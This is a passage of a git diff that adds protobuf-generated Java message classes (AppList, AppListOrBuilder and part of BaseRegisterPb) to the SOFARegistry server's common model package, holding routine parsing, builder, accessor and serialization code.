com.alipay.sofa.registry.common.model.client.pb.AppList parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList parseDelimitedFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.AppList prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code AppList} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:AppList) + com.alipay.sofa.registry.common.model.client.pb.AppListOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_AppList_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_AppList_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.AppList.class, + com.alipay.sofa.registry.common.model.client.pb.AppList.Builder.class); + } + + // Construct using com.alipay.sofa.registry.common.model.client.pb.AppList.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + version_ = 0L; + + apps_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000002); + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_AppList_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.AppList getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.AppList.getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.AppList build() { + com.alipay.sofa.registry.common.model.client.pb.AppList result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.AppList buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.AppList result = + new com.alipay.sofa.registry.common.model.client.pb.AppList(this); + int from_bitField0_ = bitField0_; + int to_bitField0_ = 0; + result.version_ = version_; + if (((bitField0_ & 0x00000002) == 0x00000002)) { + apps_ = apps_.getUnmodifiableView(); + bitField0_ = (bitField0_ & ~0x00000002); + } + result.apps_ = apps_; + result.bitField0_ = to_bitField0_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.AppList) { + return mergeFrom((com.alipay.sofa.registry.common.model.client.pb.AppList) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom(com.alipay.sofa.registry.common.model.client.pb.AppList other) { + if (other == com.alipay.sofa.registry.common.model.client.pb.AppList.getDefaultInstance()) + return this; + if (other.getVersion() != 0L) { + setVersion(other.getVersion()); + } + if (!other.apps_.isEmpty()) { + if (apps_.isEmpty()) { + apps_ = other.apps_; + bitField0_ = (bitField0_ & ~0x00000002); + } else { + ensureAppsIsMutable(); + apps_.addAll(other.apps_); + } + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.AppList parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.AppList) e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private long version_; + /** int64 version = 1; */ + public long getVersion() { + return version_; + } + /** int64 version = 1; */ + public Builder setVersion(long value) { + + version_ = value; + onChanged(); + return this; + } + /** int64 version = 1; */ + public Builder clearVersion() { + + version_ = 0L; + onChanged(); + return this; + } + + private com.google.protobuf.LazyStringList apps_ = + com.google.protobuf.LazyStringArrayList.EMPTY; + + private void ensureAppsIsMutable() { + if (!((bitField0_ & 0x00000002) == 0x00000002)) { + apps_ = new com.google.protobuf.LazyStringArrayList(apps_); + bitField0_ |= 0x00000002; + } + } + /** repeated string apps = 2; */ + public com.google.protobuf.ProtocolStringList getAppsList() { + return apps_.getUnmodifiableView(); + } + /** repeated string apps = 2; */ + public int getAppsCount() { + return apps_.size(); + } + /** repeated string apps = 2; */ + public java.lang.String getApps(int index) { + return apps_.get(index); + } + /** repeated string apps = 2; */ + public com.google.protobuf.ByteString getAppsBytes(int index) { + return apps_.getByteString(index); + } + /** repeated string apps = 2; */ + public Builder setApps(int index, java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureAppsIsMutable(); + apps_.set(index, value); + onChanged(); + return this; + } + /** repeated string apps = 2; */ + public Builder addApps(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureAppsIsMutable(); + apps_.add(value); + onChanged(); + return this; + } + /** repeated string apps = 2; */ + public Builder addAllApps(java.lang.Iterable values) { + ensureAppsIsMutable(); + com.google.protobuf.AbstractMessageLite.Builder.addAll(values, apps_); + onChanged(); + return this; + } + /** repeated string apps = 2; */ + public Builder clearApps() { + apps_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000002); + onChanged(); + return this; + } + /** repeated string apps = 2; */ + public Builder addAppsBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + ensureAppsIsMutable(); + apps_.add(value); + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:AppList) + } + + // @@protoc_insertion_point(class_scope:AppList) + private static final com.alipay.sofa.registry.common.model.client.pb.AppList DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.AppList(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.AppList getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public AppList parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new AppList(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.AppList getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/AppListOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/AppListOrBuilder.java new file mode 100644 index 000000000..32a2f38f1 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/AppListOrBuilder.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface AppListOrBuilder + extends + // @@protoc_insertion_point(interface_extends:AppList) + com.google.protobuf.MessageOrBuilder { + + /** int64 version = 1; */ + long getVersion(); + + /** repeated string apps = 2; */ + java.util.List getAppsList(); + /** repeated string apps = 2; */ + int getAppsCount(); + /** repeated string apps = 2; */ + java.lang.String getApps(int index); + /** repeated string apps = 2; */ + com.google.protobuf.ByteString getAppsBytes(int index); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/BaseRegisterPb.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/BaseRegisterPb.java new file mode 100644 index 000000000..e635d542b --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/BaseRegisterPb.java @@ -0,0 +1,1949 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code BaseRegisterPb} */ +public final class BaseRegisterPb extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:BaseRegisterPb) + BaseRegisterPbOrBuilder { + private static final long serialVersionUID = 0L; + // Use BaseRegisterPb.newBuilder() to construct. + private BaseRegisterPb(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private BaseRegisterPb() { + instanceId_ = ""; + zone_ = ""; + appName_ = ""; + dataId_ = ""; + group_ = ""; + processId_ = ""; + registId_ = ""; + clientId_ = ""; + dataInfoId_ = ""; + ip_ = ""; + port_ = 0; + eventType_ = ""; + version_ = 0L; + timestamp_ = 0L; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private BaseRegisterPb( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + java.lang.String s = input.readStringRequireUtf8(); + + instanceId_ = s; + break; + } + case 18: + { + java.lang.String s = input.readStringRequireUtf8(); + + zone_ = s; + break; + } + case 26: + { + java.lang.String s = input.readStringRequireUtf8(); + + appName_ = s; + break; + } + case 34: + { + java.lang.String s = input.readStringRequireUtf8(); + + dataId_ = s; + break; + } + case 42: + { + java.lang.String s = input.readStringRequireUtf8(); + + group_ = s; + break; + } + case 50: + { + java.lang.String s = input.readStringRequireUtf8(); + + processId_ = s; + break; + } + case 58: + { + java.lang.String s = input.readStringRequireUtf8(); + + registId_ = s; + break; + } + case 66: + { + java.lang.String s = input.readStringRequireUtf8(); + + clientId_ = s; + break; + } + case 74: + { + java.lang.String s = input.readStringRequireUtf8(); + + dataInfoId_ = s; + break; + } + case 82: + { + java.lang.String s = input.readStringRequireUtf8(); + + ip_ = s; + break; + } + case 88: + { + port_ = input.readInt32(); + break; + } + case 98: + { + java.lang.String s = input.readStringRequireUtf8(); + + eventType_ = s; + break; + } + case 104: + { + version_ = input.readInt64(); + break; + } + case 112: + { + timestamp_ = input.readInt64(); + break; + } + case 122: + { + if (!((mutable_bitField0_ & 0x00004000) == 0x00004000)) { + attributes_ = + com.google.protobuf.MapField.newMapField( + AttributesDefaultEntryHolder.defaultEntry); + mutable_bitField0_ |= 0x00004000; + } + com.google.protobuf.MapEntry attributes__ = + input.readMessage( + AttributesDefaultEntryHolder.defaultEntry.getParserForType(), + extensionRegistry); + attributes_.getMutableMap().put(attributes__.getKey(), attributes__.getValue()); + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOuterClass + .internal_static_BaseRegisterPb_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 15: + return internalGetAttributes(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOuterClass + .internal_static_BaseRegisterPb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.class, + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPb.Builder.class); + } + + private int bitField0_; + public static final int INSTANCEID_FIELD_NUMBER = 1; + private volatile java.lang.Object instanceId_; + /** string instanceId = 1; */ + public java.lang.String getInstanceId() { + java.lang.Object ref = instanceId_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + instanceId_ = s; + return s; + } + } + /** string instanceId = 1; */ + public com.google.protobuf.ByteString getInstanceIdBytes() { + java.lang.Object ref = instanceId_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + instanceId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int ZONE_FIELD_NUMBER = 2; + private volatile java.lang.Object zone_; + /** string zone = 2; */ + public java.lang.String getZone() { + java.lang.Object ref = zone_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + zone_ = s; + return s; + } + } + /** string zone = 2; */ + public com.google.protobuf.ByteString getZoneBytes() { + java.lang.Object ref = zone_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + zone_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int APPNAME_FIELD_NUMBER = 3; + private volatile java.lang.Object appName_; + /** string appName = 3; */ + public java.lang.String getAppName() { + java.lang.Object ref = appName_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + appName_ = s; + return s; + } + } + /** string appName = 3; */ + public com.google.protobuf.ByteString getAppNameBytes() { + java.lang.Object ref = appName_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + appName_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int DATAID_FIELD_NUMBER = 4; + private volatile java.lang.Object dataId_; + /** string dataId = 4; */ + public java.lang.String getDataId() { + java.lang.Object ref = dataId_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + dataId_ = s; + return s; + } + } + /** string dataId = 4; */ + public com.google.protobuf.ByteString getDataIdBytes() { + java.lang.Object ref = dataId_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + dataId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int GROUP_FIELD_NUMBER = 5; + private volatile java.lang.Object group_; + /** string group = 5; */ + public java.lang.String getGroup() { + java.lang.Object ref = group_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + group_ = s; + return s; + } + } + /** string group = 5; */ + public com.google.protobuf.ByteString getGroupBytes() { + java.lang.Object ref = group_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + group_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int PROCESSID_FIELD_NUMBER = 6; + private volatile java.lang.Object processId_; + /** string processId = 6; */ + public java.lang.String getProcessId() { + java.lang.Object ref = processId_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + processId_ = s; + return s; + } + } + /** string processId = 6; */ + public com.google.protobuf.ByteString getProcessIdBytes() { + java.lang.Object ref = processId_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + processId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int REGISTID_FIELD_NUMBER = 7; + private volatile java.lang.Object registId_; + /** string registId = 7; */ + public java.lang.String getRegistId() { + java.lang.Object ref = registId_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + registId_ = s; + return s; + } + } + /** string registId = 7; */ + public com.google.protobuf.ByteString getRegistIdBytes() { + java.lang.Object ref = registId_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + registId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int CLIENTID_FIELD_NUMBER = 8; + private volatile java.lang.Object clientId_; + /** string clientId = 8; */ + public java.lang.String getClientId() { + java.lang.Object ref = clientId_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + clientId_ = s; + return s; + } + } + /** string clientId = 8; */ + public com.google.protobuf.ByteString getClientIdBytes() { + java.lang.Object ref = clientId_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + clientId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int DATAINFOID_FIELD_NUMBER = 9; + private volatile java.lang.Object dataInfoId_; + /** string dataInfoId = 9; */ + public java.lang.String getDataInfoId() { + java.lang.Object ref = dataInfoId_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + dataInfoId_ = s; + return s; + } + } + /** string dataInfoId = 9; */ + public com.google.protobuf.ByteString getDataInfoIdBytes() { + java.lang.Object ref = dataInfoId_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + dataInfoId_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int IP_FIELD_NUMBER = 10; + private volatile java.lang.Object ip_; + /** string ip = 10; */ + public java.lang.String getIp() { + java.lang.Object ref = ip_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + ip_ = s; + return s; + } + } + /** string ip = 10; */ + public com.google.protobuf.ByteString getIpBytes() { + java.lang.Object ref = ip_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + ip_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int PORT_FIELD_NUMBER = 11; + private int port_; + /** int32 port = 11; */ + public int getPort() { + return port_; + } + + public static final int EVENTTYPE_FIELD_NUMBER = 12; + private volatile java.lang.Object eventType_; + /** string eventType = 12; */ + public java.lang.String getEventType() { + java.lang.Object ref = eventType_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + eventType_ = s; + return s; + } + } + /** string eventType = 12; */ + public com.google.protobuf.ByteString getEventTypeBytes() { + java.lang.Object ref = eventType_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + eventType_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + public static final int VERSION_FIELD_NUMBER = 13; + private long version_; + /** int64 version = 13; */ + public long getVersion() { + return version_; + } + + public static final int TIMESTAMP_FIELD_NUMBER = 14; + private long timestamp_; + /** int64 timestamp = 14; */ + public long getTimestamp() { + return timestamp_; + } + + public static final int ATTRIBUTES_FIELD_NUMBER = 15; + + private static final class AttributesDefaultEntryHolder { + static final com.google.protobuf.MapEntry defaultEntry = + com.google.protobuf.MapEntry.newDefaultInstance( + com.alipay.sofa.registry.common.model.client.pb.BaseRegisterPbOuterClass + .internal_static_BaseRegisterPb_AttributesEntry_descriptor, + com.google.protobuf.WireFormat.FieldType.STRING, + "", + com.google.protobuf.WireFormat.FieldType.STRING, + ""); + } + + private com.google.protobuf.MapField attributes_; + + private com.google.protobuf.MapField internalGetAttributes() { + if (attributes_ == null) { + return com.google.protobuf.MapField.emptyMapField(AttributesDefaultEntryHolder.defaultEntry); + } + return attributes_; + } + + public int getAttributesCount() { + return internalGetAttributes().getMap().size(); + } + /** map<string, string> attributes = 15; */ + public boolean containsAttributes(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetAttributes().getMap().containsKey(key); + } + /** Use {@link #getAttributesMap()} instead. */ + @java.lang.Deprecated + public java.util.Map getAttributes() { + return getAttributesMap(); + } + /** map<string, string> attributes = 15; */ + public java.util.Map getAttributesMap() { + return internalGetAttributes().getMap(); + } + /** map<string, string> attributes = 15; */ + public java.lang.String getAttributesOrDefault( + java.lang.String key, java.lang.String defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map map = internalGetAttributes().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, string> attributes = 15; */ + public java.lang.String getAttributesOrThrow(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map map = internalGetAttributes().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (!getInstanceIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, instanceId_); + } + if (!getZoneBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 2, zone_); + } + if (!getAppNameBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 3, appName_); + } + if (!getDataIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 4, dataId_); + } + if (!getGroupBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 5, group_); + } + if (!getProcessIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 6, processId_); + } + if (!getRegistIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 7, registId_); + } + if (!getClientIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 8, clientId_); + } + if (!getDataInfoIdBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 9, dataInfoId_); + } + if (!getIpBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 10, ip_); + } + if (port_ != 0) { + output.writeInt32(11, port_); + } + if (!getEventTypeBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 12, eventType_); + } + if (version_ != 0L) { + output.writeInt64(13, version_); + } + if (timestamp_ != 0L) { + output.writeInt64(14, timestamp_); + } + com.google.protobuf.GeneratedMessageV3.serializeStringMapTo( + output, internalGetAttributes(), AttributesDefaultEntryHolder.defaultEntry, 15); + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (!getInstanceIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, instanceId_); + } + if (!getZoneBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(2, zone_); + } + if (!getAppNameBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, appName_); + } + if (!getDataIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(4, dataId_); + } + if (!getGroupBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(5, group_); + } + if (!getProcessIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(6, processId_); + } + if (!getRegistIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(7, registId_); + } + if (!getClientIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(8, clientId_); + } + if (!getDataInfoIdBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(9, dataInfoId_); + } + if (!getIpBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(10, ip_); + } + if (port_ != 0) { + size += com.google.protobuf.CodedOutputStream.computeInt32Size(11, port_); + } + if (!getEventTypeBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(12, eventType_); + } + if (version_ != 0L) { + size += com.google.protobuf.CodedOutputStream.computeInt64Size(13, version_); + } + if (timestamp_ != 0L) { + size += com.google.protobuf.CodedOutputStream.computeInt64Size(14, timestamp_); + } + for (java.util.Map.Entry entry : + internalGetAttributes().getMap().entrySet()) { + com.google.protobuf.MapEntry attributes__ = + AttributesDefaultEntryHolder.defaultEntry + .newBuilderForType() + .setKey(entry.getKey()) + .setValue(entry.getValue()) + .build(); + size += com.google.protobuf.CodedOutputStream.computeMessageSize(15, attributes__); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + 